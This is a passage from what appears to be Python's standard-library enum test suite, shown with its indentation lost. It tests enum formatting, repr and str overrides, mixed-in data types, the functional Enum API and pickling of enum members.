self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
def __repr__(self):
return '<%s.%s: %r>' % (self.__class__.__name__, self._name_, self._value_)
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
#
class SillyInt(HexInt):
__qualname__ = 'SillyInt'
pass
class MyOtherEnum(SillyInt, enum.Enum):
__qualname__ = 'MyOtherEnum'
D = 4
E = 5
F = 6
self.assertIs(MyOtherEnum._member_type_, SillyInt)
globals()['SillyInt'] = SillyInt
globals()['MyOtherEnum'] = MyOtherEnum
test_pickle_dump_load(self.assertIs, MyOtherEnum.E)
test_pickle_dump_load(self.assertIs, MyOtherEnum)
#
# This did not work in 3.9, but does now with pickling by name
class UnBrokenInt(int):
__qualname__ = 'UnBrokenInt'
def __new__(cls, value):
return int.__new__(cls, value)
class MyUnBrokenEnum(UnBrokenInt, Enum):
__qualname__ = 'MyUnBrokenEnum'
G = 7
H = 8
I = 9
self.assertIs(MyUnBrokenEnum._member_type_, UnBrokenInt)
self.assertIs(MyUnBrokenEnum(7), MyUnBrokenEnum.G)
globals()['UnBrokenInt'] = UnBrokenInt
globals()['MyUnBrokenEnum'] = MyUnBrokenEnum
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum.I)
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum)
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_global_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
temp._cls_name = cls
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
